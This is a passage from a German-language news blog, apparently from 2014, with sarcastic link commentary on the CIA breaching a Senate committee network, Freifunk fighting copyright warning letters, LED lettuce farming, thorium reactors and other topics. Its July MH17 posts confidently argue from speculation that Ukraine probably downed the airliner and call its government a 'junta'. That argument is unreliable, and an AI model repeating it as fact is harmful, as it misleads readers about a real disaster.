Aber die Details sind so dermaßen geil, das kann man sich gar nicht ausdenken. Fangen wir mal mit dem ersten Satz an.
An internal investigation by the Central Intelligence Agency has found that its officers improperly penetrated a computer network used by the Senate Intelligence Committee in preparing its report on the C.I.A.'s detention and interrogation program.
Lest euch das mal ein paar Mal durch. Und dann erklärt mir, was das "improperly" da soll. Das klingt für mich wie wenn sich der Mörder vor Gericht entschuldigt, die Blutspritzer nicht weggemacht zu haben. Als bereuten sie hier lediglich, dass sie erwischt wurden.
Weiter:
The statement said that John O. Brennan, the C.I.A. director, had apologized to the two senior members of the Senate Intelligence Committee and that he would set up an internal accountability board to review the matter.
JETZT wollen die ein internes Gremium schaffen, das Missbrauch untersuchen soll!
Mit anderen Worten: Sowas gibt es noch nicht.
Unnötig zu erwähnen, dass der CIA-Chef, der sich jetzt "entschuldigt" hat, das noch im März erst schlicht geleugnet und dann einen "das war alles ganz anders und gerechtfertigt" gepullt hat.
Oh und die Kirsche auf der Schlagsahne: Wieso haben die sich da eigentlich reingehackt? Kommt ihr NIE drauf!
Last year, the C.I.A. gained access to a computer network, reserved solely for Senate investigators working at an agency facility in Northern Virginia, after officials suspected the intelligence committee had improperly obtained an internal C.I.A. report about the detention program, which is now defunct.
Die dachten, das Kontrollgremium habe sich Zugang zu Beweisen verschafft. Und DAS geht ja mal GAR nicht!1!! Wo kommen wir da hin, wenn die andere Beweise auswerten, als die "Beweise", die wir ihnen gegeben haben?! Völlig klar, da musste jemand was tun!

Fri Jul 25 2014

[l] Ah, es bleibt spannend bei dem Reuters-Interview mit dem Separatisten. Und zwar hat auch Reuters eine Audio-Aufnahme gemacht, und die ist jetzt bei Radio Free Europe zu hören. Mit Untertiteln. Ich habe mal jemanden mit Russischkenntnissen gefragt, ob die Übersetzung akkurat ist. Ist sie wohl, aber eine Stelle ist doppeldeutig. Und zwar fragen sie ihn, ob die Buk-Stellung denn jetzt bei den Separatisten ankam, und er sagt sowas wie "Nein, die ging zurück". Daraus schließt Reuters, dass sie sie hatten, möglicherweise einsetzten, und dann ging sie zurück. Er sagt bei RT, er meinte damit, dass sie die nie in Besitz hatten, weil sie nie ankam.
Und noch ein Detail will ich euch nicht vorenthalten. Jemand, der sagt, er sei "bei der Flak" gewesen, schreibt: 1. wenn das gut ausgebildete Schützen waren, dann war das Absicht. Man kann zivile Flugzeuge auf dem Radar gut erkennen, an Flughöhe, Geschwindigkeit und Kurs, und würde die nicht mit einem Militärflugzeug verwechseln. Außerdem schreibt er, der Flieger sei von links getroffen worden, und links von der Flugroute war Separatistengebiet. Ich habe mal zurück gefragt, ob man das bei so einer SAM nicht einstellen kann, ob man von rechts oder links treffen will. Ich habe das auch noch nicht in der Presse gesehen, dass der Einschlag von links kam. Das wäre ja in der Tat ein wichtiges Indiz dafür, dass es doch nicht die Ukraine sondern die Rebellen waren. Es bleibt spannend!
Update: Kann man nicht einstellen.
[l] ACH. Die "Regierung" der Ukraine ist zurückgetreten.
Das ist ja mal schockierend. Sehr schön, dann kann es da ja jetzt mal ordentliche Wahlen geben, und dann löst sich vielleicht dieser ganze bescheuerte Krieg in Wohlgefallen auf. Das wäre ja mal ein schöner Sommernachtstraum.
Ich bin ja im Moment zu glauben geneigt, dass die Ukraine den Jet runtergeholt hat, aus Versehen oder weil ein Hitzkopf der Nazipartei (die ja den "Sicherheitsapparat" des Landes gestellt haben) freigedreht hat.
Dazu ein paar Überlegungen.
So ein Luftabwehrsystem ist kein Spielzeug, das holt nicht Flugzeuge runter, wenn man wild Knöpfe drückt. Das ist ein Präzisionsinstrument, das von geschultem Personal bedient werden muss. Geschultes Personal gibt es genug, weil die Rote Armee daran ausgebildet hat. Versehentlich ein Flugzeug runterholen kann also nur passieren, wenn jemand den Befehl gegeben hat, der die Lage falsch eingeschätzt hat.
Was die einzelnen Parteien wissen, kann man aus ihrem Verhalten rekonstruieren. Die Amis und Russen haben ordentliches Militärequipment und wissen, wer das war.
Wenn es die Russen wären, hätten die Amis ein Fass aufgemacht. Also sind es nicht die Russen.
Wenn es die Separatisten wären, hätten sie die Blackboxen vernichtet und wären da jetzt nicht abgezogen. Und Russland würde nicht Aufklärung fordern sondern die Klappe halten, damit nicht der Eindruck entsteht, dass sie diese Monster noch decken.
Bleibt nur noch die Ukraine. Das ist konsistent mit dem Verhalten der Amis und Russen. Die Amis können nicht die Ukraine anpissen, weil sie ja die Junta da mit viel Geld überhaupt erst installiert haben. Die Russen wissen, dass ihnen keiner glauben würde, wenn sie die Ukraine offen anklagen. Daher halten sie sich betont zurück und sprechen nicht mal die Möglichkeit an, dass die Ukraine das war, fordern nur immer wieder vom Westen Aufklärung.
Die objektiv debilste Sache, die im Moment gefordert werden kann, sind mehr Sanktionen gegen Russland. Das entbehrt so komplett jeder rationalen Grundlage, dass die Politiker das nicht tun würden, wenn es eine bessere Option gäbe.
Warum bin ich mir so sicher, dass die Amis und Russen wissen, wer das war? Das ist in modernen Kriegen die Doktrin, dass die gegnerische Luftabwehr als erstes ausgeschaltet wird. Luftabwehr funktioniert so, dass man ein Radar hat, damit den Feind ordet, und dann Raketen in die grobe Richtung schießt. Die haben dann ein Lenksystem für die letzte Meile, Infrarot oder ein eigenes Mini-Radar. Radar kann man orten. Weil das eben der Vorläufer einer Luftabwehrrakete ist, ist die Sensorik in so einem Krieg darauf ausgelegt, gegnerisches Radar sofort zu erkennen. Es gibt Lenkraketen, die ihre Zielsuche über gegnerischen Radar machen. Die schießt man los, und die fliegen dann von selbst in die Quelle des Radarsignals rein. Daher ist so ein Buk-System so aufgebaut, dass der Radar-Teil auf einem separaten Truck ist und möglichst weit weg von den Raketen-Launchern steht, damit der Feind das Radar im Notfall kaputtmachen kann, ohne damit auch die Raketen zu zerstören. Das kann mir keiner erzählen, dass jemand in einem Krisengebiet ein Buk-Radar in Betrieb nehmen kann, und die Nato weiß nicht sofort mit Auflösung unterhalb einem Meter die Position. Und dann schaut man mit dem Spionagesatelliten und kann sehen, welche Uniform der Typ trägt, der da am Knopf sitzt.
Daher wissen die Amis, dass das eine Buk-Stellung der Ukraine war, und dass die von Soldaten mit ukrainischer Uniform betrieben wurde. Das ist die einzige Erklärung für deren aktuelles Herumgedruckse, man sei sich da nicht sicher. Wenn das russische Uniformen gewesen wären, hätten sie das gesagt. Wenn die Amis sagen, man sei sich nicht sicher, dann sind das ukrainische Uniformen und sie meinen, das könnten ja auch Deserteure gewesen sein. Beachtet, dass die Maschine am hellichten Tag runtergeholt wurde, nicht in der Nacht.
Andere denkbare Szenarien sind:
1. Die Amis wollen nicht sagen, was sie wissen, um die Reichweite und Auflösung ihrer Aufklärungstechnik nicht zu verraten. Könnte sein, ist aber nicht sehr glaubwürdig. Dann verpixelt man halt, haben sie ja im Irakkrieg auch gemacht bei ihren "Beweisen" dort.
2. Es gab gar kein Radar zu der Buk, und die Zielkoordinaten wurden manuell eingegeben. Die Russen könnten ihren Kumpels in Donetsk die Koordinaten gegeben haben. Wieso würden die Russen das machen?
Theorien, bei denen die Russen dumme Fehler machen, halte ich grundsätzlich für nicht verfolgenswert :-)
Die EU-Politik hat sich derweil völlig von den Fesseln der Realität befreit und blubbert was von Sanktionen gegen Russland, die von allen in der Gegend sicher am meisten zu verlieren hatten, wenn da ein ziviles Flugzeug abgeschossen wird.

Thu Jul 24 2014

[l] Es geht voran bei der MH17-Untersuchung. The Australian berichtet (leider hinter einer Paywall), ein australischer Experte sei jetzt vor Ort und habe Shrapnel-Löcher identifiziert. Damit kann als belegt gelten, dass das ein Abschuss war und kein Unfall.
Die Niederländer haben die Black-Boxen angeguckt und festgestellt, dass die nicht manipuliert waren. Das hat sie verwundert, weil sie davon ausgingen, dass die fiesen Rebellen Schuld sind und die Beweise gegen sich vernichten würden. Tja, womöglich waren die es ja gar nicht?
Das Kriegsgebiet ist immer noch nur wenige Kilometer von der Absturzstelle entfernt; einige Bergbauarbeiter in einer Kohlemine in der Gegend haben sich wohl entschieden, lieber unter Tage zu bleiben als nach Hause zurückzukehren, weil das sicherer ist.
Die sind offenbar immer noch dabei, da Leichen zu finden und zu bergen.
Die Rebellen haben sich wohl in den letzten Tagen aus der direkten Gegend nach Donetsk zurückgezogen und bereiten sich dort auf eine längere Belagerung vor. Angeblich ist von den Russen eine Waffenlieferung zu ihnen unterwegs. Der Punkt ist jedenfalls, dass die Rebellen-Militärs, die die Beobachter ferngehalten hatten, jetzt nicht mehr da sind. Die Rebellen haben der Presse gesagt, sie dürfe keine Details berichten, die die Position ihrer Stellungen verraten würde.
Anscheinend werden in der Gegend schon zwei Journalisten und ein Übersetzer vermisst, vermutlich von den Rebellen gefangen genommen.
Ich persönlich vermute jetzt, dass die Rebellen nicht Schuld an dem Abschuss waren, sonst hätten sie die Blackboxen verschwinden lassen und jetzt nicht die Gegend freigemacht. Und die Amis haben das ja alles gesehen mit ihren Satelliten; wenn da ein Beweis für die Schuld der Rebellen zu sehen gewesen wäre, hätten wir davon gehört.

Wed Jul 23 2014

[l] Obamacare ist immer noch nicht in trockenen Tüchern. Das kann ja alles nicht wahr sein.
Das Gesetz sieht vor, dass die US-Bundesländer eigene Versicherungs-Märkte aufsetzen, bei denen die Bürger dann ihre Policen kriegen können. 34 der 50 Bundesländer haben das nicht gemacht, vor allem die republikanisch regierten. Also hat die Bundesregierung in diesen Staaten Versicherungspolicen subventioniert, damit die Bürger trotzdem an Policen zu den ihnen zustehenden Konditionen kommen.
Ein Bundes-Berufungsgericht in Washington DC hat jetzt geurteilt, dass sie diese Subventionen nicht zahlen dürfen. Ein anderes Berufungsgericht hat allerdings fast zeitgleich das Gegenteil geurteilt.

Mon Jul 21 2014

[l] Der Iran hat die Hälfte seines Bestands an hochangereichertem Uran unschädlich gemacht. Für Atomkraftwerke braucht man 5% Anreicherung, für Kernwaffen 90%, der Iran hatte Uran mit 20%.
Schade nur, dass Israel gerade eine Gaza-Offensive fährt, so fällt diese Meldung komplett unter den Tisch. (Danke, Arndt)

Fri Jul 18 2014

[l] Der Guardian hat ein gutes Interview mit Snowden in Russland gemacht.

Mon Jul 14 2014

[l] Es gibt da seit einiger Zeit einen Abmahnkrieg zwischen den einschlägigen Kanzleien und den Freifunkern (stellvertretend für alle Betreiber von öffentlichen WLANs), seit wir in Deutschland das Konzept der Störerhaftung haben, und jemand gemerkt hat, dass man das auf Filesharing in WLANs anwenden kann. Normalerweise kriegt man das weg, wenn man zurück schreibt, dass man unter das Providerprivileg fällt, dann geben die Ruhe, aber Rechtssicherheit ist was anderes. Daher haben die Freifunker mal einen Gegenschlag durchgeführt. Und zwar kann man über eine sogenannte Negative Feststellungsklage gerichtlich klären lassen, ob die Abmahnung an sich überhaupt rechtens war. Genau das war auch die Strategie der Freifunker. Das kann man unter bestimmten Umständen machen (wenn die Abmahner ihre Abmahnung nicht fristgemäß zurückziehen). Natürlich tun die das normalerweise nicht, weil sie ja nicht gerichtsfest einräumen wollen, dass ihr Geschäftsmodell auf Sand gebaut ist. Und die meisten Abgemahnten sind zufrieden, wenn ihre Abmahnung weg geht, und wollen da nicht noch Geld hinterher werfen für eine Klärung. Sowas kann ja auch nach hinten losgehen.
Die meisten Abmahner freuen sich über Leute, die sofort bezahlen, und legen alle, die sich zur Wehr gesetzt haben, auf einen großen Stapel, den sie vor Ablauf ihrer eigenen Verjährungsfrist nochmal wieder abarbeiten – oder am Stück an Inkassogeier zum Nochmal-Probieren verticken. Wenn man denen also eine Frist gesetzt hat und die nicht innerhalb der Frist antworten, stehen sie selber mit einem Bein im Gerichtssaal, lassen es aber meistens drauf ankommen, entweder weil sie nicht damit rechnen oder weil sie sich im Recht fühlen, auch die negative Feststellungsklage zu gewinnen.
Nachdem nun publik wurde, dass die Klage eingereicht wurde, haben Waldorff und Frommer sofort alle Forderungen aus der Abmahnung gegen die Freifunker zurückgenommen – für die notorischen Abmahner aber leider, leider zu spät, da das Verfahren formal schon eingeleitet wurde. Die Freifunker wiederum wollen natürlich die gerichtliche Entscheidung.
Mit der Klageschrift liegt nun ein recht ordentlich ausgearbeitetes Template vor, mit dem sich jeder schon recht solide verteidigen kann, der unberechtigt abgemahnt wurde und es darauf ankommen lassen will. Unberechtigt ist die Abmahnung – kurz gesagt –, wenn man es nicht selber war, sondern Haustier, Nachbar, Gast oder Familie und das – ganz wichtig – auch nicht nur wie ein blöder Vorwand daherkommt. Im Kern geht es den Freifunkern darum, die sogenannte Störerhaftung abzuschießen – also das obrigkeitsdenkende Prinzip "den Letzten beißen die Hunde", dass sich doch gefälligst keinerlei Handlung im Internet ohne einen Schuldigen zutragen darf, den man dafür belangen kann. Dieses Artefakt sorgt zuletzt dafür, dass sogar das von der Kommune Potsdam initiierte Stadtfunk-Netz sämtlichen von ihren öffentlichen Zugangspunkten entstandenen Traffic durch einen Tunnel nach Slovenien fallen ließ – aus Angst vor der Abmahnindustrie.
Bei den Freifunkern hat es geklappt.
Am besten wäre natürlich, wenn sich nun genug Leute gegen unberechtigte Abmahnungen wehren, damit das Geschäftskonzept von "die meisten Leuten werden lieber bezahlen, um Ruhe zu haben, statt sich einen Anwalt zu nehmen" endlich platzt. Also: Wenn man ungerechtfertigt abgemahnt wird, sofort mit Fristsetzung bestreiten und androhen, gerichtlich feststellen zu lassen, dass die Abmahnung unberechtigt ist. Dazu braucht man erstmal keinen Anwalt. Wenn sich im Nachhinein herausstellt, dass die Abmahner hätten erkennen müssen, dass die Abmahnung unberechtigt ist, muss der Abmahner sogar die eigenen Anwaltskosten übernehmen. Daran arbeiten die Freifunker jetzt.
Es gab zu dem Themenkomplex auch schon mal ein Chaosradio und wir hatten auch auf dem 29c3 was dazu.

Thu Jul 10 2014

[l] Heilige Scheiße, das ist ja mal abgefahren: Salatproduktion mit LED-Beleuchtung in einer alten Halbleiterfabrik. Die Seite ist Werbung des LED-Herstellers, insofern muss man das mit Vorsicht genießen, aber schaut euch mal die Bilder an, und was die so für Zahlen behaupten:
Shimamura says that the systems allows him to grow lettuce full of vitamins and minerals two-and-a-half times faster than an outdoor farm. He is also able to cut discarded produce from 50 percent to just 10 percent of the harvest, compared to a conventional farm. As a result, the farms productivity per square foot is up 100-fold, he says.
Das ist ja echt mal eine Revolution. Die Frage ist natürlich, wie teuer das dann ist. Heben die Effizienzgewinne und das vermutlich einfachere Ernten und der geringere Ausschuss die laufenden Kosten auf? Ist dieser Salat wirklich genau so gesund und vitaminreich wie normaler Salat? Nicht das dann am Ende so welker Plastiksalat ist.
Update: Ich habe eine Mail von einem Forscher am Institut für Pflanzenbau und Pflanzenzüchtung der Uni Kiel gekriegt, der hat das mal ausgerechnet und kommt auf 1,17€ reine Stromkosten pro Salatkopf. Das ist ja doch deutlich mehr als ich gedacht hätte, denn da kommen ja noch die ganzen anderen Kosten dazu, Ernten, Wasser, Shipping und Handling, etc. Dass das in Japan trotzdem gemacht wird, liegt an den Folgen von Fukushima.

Thu Jul 3 2014

[l] Ihr habt ja sicher von dieser GEMA-Alternative C3S gehört. Was ist aus denen eigentlich geworden? Man hört ja so wenig von denen!
Das liegt, wie sich herausstellt, an der Telekom. Die schafft es seit Monaten nicht, C3S einen Anschluss zu schalten.
Ich erinnere mich bei solchen Geschichten immer daran, wie wir uns in den 80ern über die DDR lustig gemacht haben, weil man da ewig lange auf einen Telefonanschluss warten musste, während das bei uns flutschte. Das waren noch Zeiten.

Wed Jul 2 2014

[l] Japan weicht die Militär-Klausel in der Verfassung auf. Weil sie dafür nicht die Mehrheit hatten, tun sie, was die anderen westlichen Nationen wie USA und Deutschland ihnen vorgemacht haben, und legen sich einfach eine neue "Interpretation" der an sich eindeutigen Gesetzeslage zurecht. So ala "naja, Alliierten zu Hilfe kommen wird ja wohl nicht gemeint sein". So ging das ja auch bei uns mit den Kriegseinsätzen los.

Tue Jul 1 2014

[l] Habt ihr euch auch solche Sorgen um Dirk "Bundeswehr" Niebel gemacht? Dass der jetzt arbeitslos wird? Nachdem er so einen tollen Job im Entwicklungshilfeministerium gemacht hat?
Keine Sorge, das ist völlig unbegründet. Dirk Niebel fängt jetzt bei Rheinmetall an. Rheinmetall baut Panzer. Er soll sich da um "den Aufbau globaler Regierungsbeziehungen" kümmern.

Mon Jun 30 2014

[l] Mir wird gerade vermehrt dieser Link gemailt. Nun, äh, das hatte ich schon 2012 im Blog.
[l] Hier kommt ein schöner Fnord als Leserbrief rein. Ich kommentiere das mal gar nicht selber sondern zitiere die schöne Einleitung mit:
kennst du diesen Witz, dass jeder deutsche Tourist sofort überall seine deutschen Marotten verbreitet und Recyclingstationen aufstellt und an Wände klopft und sagt, dass das so eigentlich gar nicht hätte zugelassen werden sollen? Ich habe hier den Beweis, dass die deutschen Jihadisten das gleiche machen, wenn sie woanders hingehen.
in Syrien und im Irak wurde ja diese Woche das Kaliphat ausgerufen. Zuständig für die Propaganda ist das "Al Hayat Media Center", die Namen sind jedoch austauschbar, wechseln und sind doppelt belegt. Whatever. Neben Arabisch will dieses Media Center auch Inhalte auf englisch, russisch, französisch und deutsch bereitstellen. Neben den Videos und den Deklarationen gibt es aber auch normale Propaganda, die das Leben in den Gebieten über allen Klee loben soll.
Jetzt rate mal, was das Titelthema der ersten deutschsprachigen Ausgabe des "Islamic State report" ist?
Da kommst du nie drauf.
Verbraucherschutz!
Und Tatsächlich! Mwahahahaha :-)
Update: Die Englische Version hat auch "Consumer Protection" als Titelthema. Können wir daraus schließen, dass das ganze Pamphlet von Deutschen gemacht wurde?

Sat Jun 28 2014

[l] Schuld an der drohenden Staatspleite von Argentinien ist übrigens Paul Singer und sein Vulture Fund. Paul Singer und der Begriff Vulture sind durch die Arbeit von Greg Palast populär gemacht worden, und bei dieser Gelegenheit möchte ich nochmal ausdrücklich dessen Bücher empfehlen, nicht nur zum Thema Vulture. Hier ist eine Story von 2012 zum Anfixen :-)
[l] Kennt ihr den schon? Frau bestellt Buch mit "Kuba" im Titel, Bank storniert Überweisung. Die Schweizer Banken haben anscheinend schön im Rektum der USA bequem gemacht. (Danke, Tibor)

Tue Jun 24 2014

[l] Beim letzten Fnord-Jahresrückblick haben wir uns noch darüber lustig gemacht, wie Deutschland aus PR-Gründen angesagt hat, das Gold aus New York zurück ins Inland zu karren. Das Gold, von dem sich viele Verschwörungstheorien einig sind, das da gar nicht mehr physisch liegt, weil die Fed davon ausgegangen ist, dass das eh nie jemand abholen wird, und es verscheuert hat. Und wenn doch mal jemand kommt, kann man es ja schnell zurück kaufen. Oder so. Jedenfalls war die Punchline, dass nach Beginn dieser großangekündigten Rückholaktion nur homöopathische Dosen an Gold tatsächlich ankamen. Wir hatten eine Folie, dass sie wahrscheinlich Brieftauben als Transportmedium nehmen.
Und jetzt? Jetzt kommt raus, dass das Gold doch lieber in New York bleibt. Na da haben ja alle Beteiligten nochmal Schwein gehabt! Das hätte echt peinlich werden können!

Fri Jun 20 2014

[l] Der US Supreme Court hat sich mit Softwarepatenten beschäftigt. Ergebnis: "Wird auf einem Computer gemacht" reicht nicht. Wie ein krachender Erfolg liest sich das für mich gerade nicht. Was ich mich vor allem frage: Wenn da nicht ein Australier der Patenttroll gewesen wäre, sondern umgekehrt einer der vielen US-Trolle ein paar Australier zur Kasse gebeten hätte, hätten sie das Verfahren dann überhaupt angenommen?

Thu Jun 12 2014

[l] Einen noch zu Schirrmacher.
Die Zeitungsbranche ist ja generell in der Krise gerade. Die meisten Verleger und Journalisten gehen in so einer Situation "in den Energiesparmodus", um mal Computer-Terminologie zu verwenden. Die fangen an, sich zu überlegen, wie sie möglichst wenig Aufwand in ihre Zeitung tun können, um mit der gegebenen Kohle möglichst lange durchzuhalten. Das Ergebnis ist eine Zeitung, die keiner mehr lesen will, weil da keiner Aufwand reingesteckt hat.
Schirrmacher hat nicht gefragt, was er tun muss, damit die FAZ möglichst lange macht. Er hat gefragt, was jetzt getan werden muss. Und das hat er dann getan.
Nicht was jetzt für die FAZ getan werden muss.
Was getan werden muss.
Er hat natürlich auch die ganze Zeit (soweit ich das aus meinen paar Begegnungen und Gesprächen beurteilen kann) im Hinterkopf Sorgen gehabt, wie es weitergehen soll, und wo es hingehen soll. Aber das ist ja eh immer so. Um nicht zu sagen: Wenn das nicht so ist, ist man gerade in einer Blase, die bald platzen wird, das ist noch schlimmer.
Aber er hat sich nicht irre machen lassen, sondern hat gemacht, was die Welt gerade brauchte. Er hat, um das mal ganz Hollywood-platt zu sagen, die Bedürfnisse und Nöte der Gesellschaft über die seiner Zeitung und seiner selbst gestellt, und für wichtige Dinge wie den Staatstrojaner damals eben Platz gemacht, auch wenn das hieß, dass dafür andere Dinge hinten runter fielen, weil kein Platz mehr war. Oder für das Genom. Für die NSA-Geschichte.
Das ist kurzfristig riskant, aber hat sich eigentlich immer ausgezahlt. Jedenfalls erinnert man sich nachher nicht an die Fälle, bei denen es mal nicht funktioniert hat, weil es da auch nicht schlechter war als das Energiesparmodus-Programm der Konkurrenz.
Ich wünschte, mehr Zeitungen würden so gemacht werden.
Und mehr Teile der FAZ.

Sat May 24 2014

[l] Korea will Seoul frauenfreundlicher machen. Die Umsetzung wirkt allerdings eher wie eine Idee von Monty Python:
Seoul City introduced parking lots marked with pink lines giving priority to women in April, with wider spaces, brighter lights and CCTVs to ensure the safety and convenience of female drivers as part of the city's ``Women Friendly Seoul'' project.
Auf dem Foto hier sieht das eher aus, als hätten sie die länger als breiter gemacht.

Thu May 22 2014

[l] Hier ist noch einer für die Aluhut-Fraktion: Privacy International hat mal einen Blick auf die vom GCHQ zerstörten Festplatten beim Guardian genommen. Dabei kam raus, dass die eben nicht nur die Festplatten kaputtgemacht haben, sondern offenbar auch gezielt andere Teile. Teile, die man erstmal nicht direkt für gefährlich oder wichtig halten würde.
During our invesitgation, we were surprised to learn that a few very specific components on devices, such as the keyboard, trackpad and monitor, were targeted along with apparently trivial chips on the main boards of laptops and desktops. Initial consultation with members of the technology community supported our identification of the components and that the actions of GCHQ were worth analyzing further.
Die haben da ein paar Fotos. Das großartigste an dem Artikel ist aber das hier:
Privacy International would like to emphasise that at no point did we attempt to recover any data from the Guardian devices.
Don't guantanamo me, bro!

Wed May 21 2014

[l] Schlagzeile des Tages: "Thailand's army declares martial law, says not a coup"
Oh, kein Putsch? Na dann ist ja gut!1!! Für eine Sekunde habe ich mir echt Sorgen gemacht! Denn so gänzlich ohne Präzedenzfall wäre das nicht.
[l] Das oberste Gericht der Schweiz hat ein Urteil gegen jemanden aufgehoben, der öffentlich einen Hitlergruß gemacht hatte.
[l] Der Lavabit-Chef erzählt im Guardian, warum er zugemacht hat. Die haben erst "lawful interception"-Schnittstellen verlangt und wollten dann auch noch oben drauf seine SSL-Keys haben.

Mon May 19 2014

[l] Die OpenBSD/LibreSSL-Leute haben mal eine Präsentation zu OpenSSL gemacht. Comic Sans FTW!

Thu May 15 2014

[l] Nachdem Spon mit "So löschen Sie" aufgemacht hat, titelt die amerikanische Presse heute morgen mit "Google swamped by takedown requests after court ruling" :-)
Ich glaube ja, dass Google da jetzt massiv Kapital draus schlagen wird. Sie müssen ja verifizieren, ob der Takedown auch von der Person kommt, deren Daten da stehen. Dafür werden sie einfach einen "verifizierten Google+-Account" einführen. Win-Win!1!!
Update: Twitter und Facebook wollen ja jetzt schon Ausweiskopien für ihre Beschwerden sehen, damit sie ihre Datensätze dagegen validieren können. Wieso sollte Google+ da auch zurückfallen. Der Spon-Anwalt schreibt ja auch direkt, eine Ausweiskopie solle man beilegen. Ganz großes Kino!
Update: Wow, ich bin erstaunt, wie viele Menschen mir gerade schreiben, dass man seinen Ausweis gar nicht kopieren darf. Das stimmt, auch schon länger, und ich bilde mir ein, das hier auch mal gebloggt zu haben. Es ist trotzdem gängige Praxis bei Twitter und Facebook.

Wed May 14 2014

[l] Öh, whut? Der australische Professor, auf dessen Untersuchungen die Idee zurück geht, dass es eine Gluten-Unverträglichkeit geben könnte, hat seine Studie nochmal ordentlich gemacht. Ergebnis:
“In contrast to our first study… we could find absolutely no specific response to gluten."
Update: Das habe ich falsch übersetzt. Gemeint ist nicht die Autoimmunkrankheit, bei der man gar kein Gluten essen kann. Ich dachte, dieses "das mag meine Verdauung nicht" heißt Gluten-Unverträglichkeit, aber es heißt tatsächlich Gluten-Sensitivität.
[l] Weil der "Verfassungsschutz" zu inkompetent ist, selber Ermittlungen durchzuführen, hören sie halt Telefonate von weniger unfähigen Journalisten ab. Und versuchen die dann zu bedrängen, vor Gericht ihre Quellen zu verraten. Wieso existiert dieser Schandfleck einer Behörde eigentlich noch?
Update: Radio Eriwan: Im Prinzip richtig, aber nicht der VS hat abgehört sondern das LKA, und sie haben auch nicht die Journalistin abgehört sondern den Konvertiten, den die Journalistin dann anrief und so in die Fänge des Abhörapparates geriet. Die Journalistin hat von ihrem Zeugnisverweigerungsrecht Gebrauch gemacht. Markus Kompa klärt das mal auf.

Mon May 12 2014

[l] Wenn man sich mit Kernkraft-Apologeten unterhält, hört man häufig, dass ja die ganzen Probleme weggingen, wenn man nur ordentliche Thorium-Reaktoren bauen würde. Thorium kommt viel häufiger in der Natur vor als Uran und kann auch nahezu restlos verbrannt werden. Außerdem wären diese Reaktoren inhärent sicher und bräuchten keine Notabschaltung, weil die Reaktion von alleine zum Erliegen kommt. Neben der "kann das stimmen"-Frage (die wir auch in Alternativlos 14 mit einem Experten besprochen haben) stellt sich dann auch die Frage, wieso wir eigentlich nie Thorium-Reaktoren gebaut haben. Wie sich rausstellt, haben wir. Und das war ein Desaster.
The first commercial nuclear plant to use thorium was Indian Point Unit I, a pressurized water reactor near New York City that began operation in 1962. Attempts to recover uranium 233 from its irradiated thorium fuel were described, however, as a “financial disaster.” The last serious attempt to use thorium in a commercial reactor was at the Fort St. Vrain plant in Colorado, which closed in 1989 after 10 years and hundreds of equipment failures, leaks, and fuel failures. There were four failed commercial thorium ventures; prior agreement makes the US government responsible for their wastes.
Die Details über das amerikanische Atomprogramm sind atemberaubend. Erstens fehlen ihnen da jetzt knapp 100 kg waffenfähiges Uran 233, und zweitens sowas hier:
Then, an Energy Department safety investigation found a national repository for uranium 233 in a building constructed in 1943 at the Oak Ridge National Laboratory. The repository was in dreadful condition; investigators reported an environmental release from a large fraction of the 1,100 containers “could be expected to occur within the next five years in that some of the packages are approaching 30 years of age and have not been regularly inspected.” The Energy Department later concluded that the building had “deteriorated beyond cost-effective repair. Significant annual costs would be incurred to satisfy current DOE storage standards, and to provide continued protection against potential nuclear criticality accidents or theft of the material.”
Oh Mein Gott.
Die Geschichte geht dann noch weiter. Das Department of Energy hat sich dann entschlossen, das Uran einfach nach Nevada zu schicken, damit es dort auf eine Müllhalde gekippt wird. Nicht irgendeine Müllhalde, eine bei der Nevada Nuclear Security Site. Immerhin. Aber das Verklappen dort würde gegen die diversen Regeln verstoßen, die es da gibt. Lösung: Die Regeln kommen vom Department of Energy, also haben sie sie halt weggemacht für den Fall.

Sat May 3 2014

[l] Die US-Satellitenaufklärung wird von einem Geheimdienst namens NRO gemacht, National Reconnaissance Office. Die prüfen ihre Mitarbeiter ordentlich durch, unter anderem mit Lügendetektortests. Dabei hat einer gestanden, dass er ein minderjähriges Mädchen vergewaltigt hat. Was tat die NRO daraufhin?
Nichts. Begründung: Die ist 14 Jahre alt, die kann ja wohl selber die Polizei rufen! Im Übrigen wäre das eine Ländersache, kein Bundesproblem, und wir sind eine Bundesbehörde. Glaubt ihr nicht?
the National Reconnaissance Office's then-top lawyers said they "were not legally obligated … to report child sexual abuse to DOJ or law enforcement organizations because child abuse is a state crime, not a federal crime," the report said.
Ach ja, und im Übrigen haben sie dann — völlig überraschend!1!! — festgestellt, dass ihr Lügendetektorprogramm Security-Theater ist und nicht funktioniert. NEIN! DOCH! OH! (Danke, Oliver)

Thu May 1 2014

[l] In den USA werden Porno-Darstellern reihenweise die Bankkonten zugemacht. Die Begründungen klingen initial, als seien die Banken jetzt unter die Moralpolizei gegangen, aber es steht natürlich die Vermutung im Raum, dass dahinter das "Justizministerium" steckt.
[l] Großartiges Essay zur Wissenschaft. Ihr kennt das ja, wenn man ein Experiment macht, um zu gucken, ob ein Medikament was taugt, dann hat man eine Testgruppe und eine Kontrollgruppe, die ohne es zu wissen nur ein Placebo kriegt. Das Essay hat jetzt als Prämisse, dass man das auch auf einer Meta-Ebene machen kann. Als Kontrollgruppe für Wissenschaft schlägt er Parapsychologie vor. Das ist wie ein Placebo, weil wir wissen, dass das alles Bullshit ist, aber die Teilnehmer der Gruppe halten es für echt und glauben dran.
So und jetzt lest euch das mal in Ruhe durch, was aus dieser großartigen Prämisse für Gedankengänge folgen. Wun-der-bar!
Die offensichtliche Hypothese ist natürlich, dass unsere wissenschaftlichen Standards nicht ausreichen, wenn am Ende immer noch Bullshit publiziert werden kann. Also schlagen sie 10 Punkte vor, die für einen das lesenden Akademiker klingen, als sei das damit festgenagelt. Und dann kommt der eine Typ und macht eine Metastudie, die 8 von diesen 10 Punkten genügt, und "beweist" trotzdem die Existenz von übernatürlichen Kräften.
Eines der Highlights ist dann ein Paper von zwei Wissenschaftlern, der eine glaubt an Parapsychologie, der andere nicht. Die haben das selbe Experiment gemacht, und der Glaubende beweist mit dem Experiment die Existenz von PSI, der nicht Glaubende widerlegt sie. Daraufhin setzen die sich zusammen und machen das selbe Experiment in dem selben Labor zur selben Zeit, und per Zufall wird pro Proband entschieden, wer jetzt das Experiment leitet. Aber die Parameter sind so festgezurrt, dass "Leiten" in dem Kontext nur noch heißt, wer den Probanden begrüßt und auf den Monitor guckt. Und das Ergebnis? Wieder beweist der Glaubende PSI und der andere widerlegt es. Das Paper muss ganz großes Kino sein. Money Quote:
This is the only journal article I’ve ever read where, in the part of the Discussion section where you’re supposed to propose possible reasons for your findings, both authors suggest maybe their co-author hacked into the computer and altered the results.
MWAHAHAHA
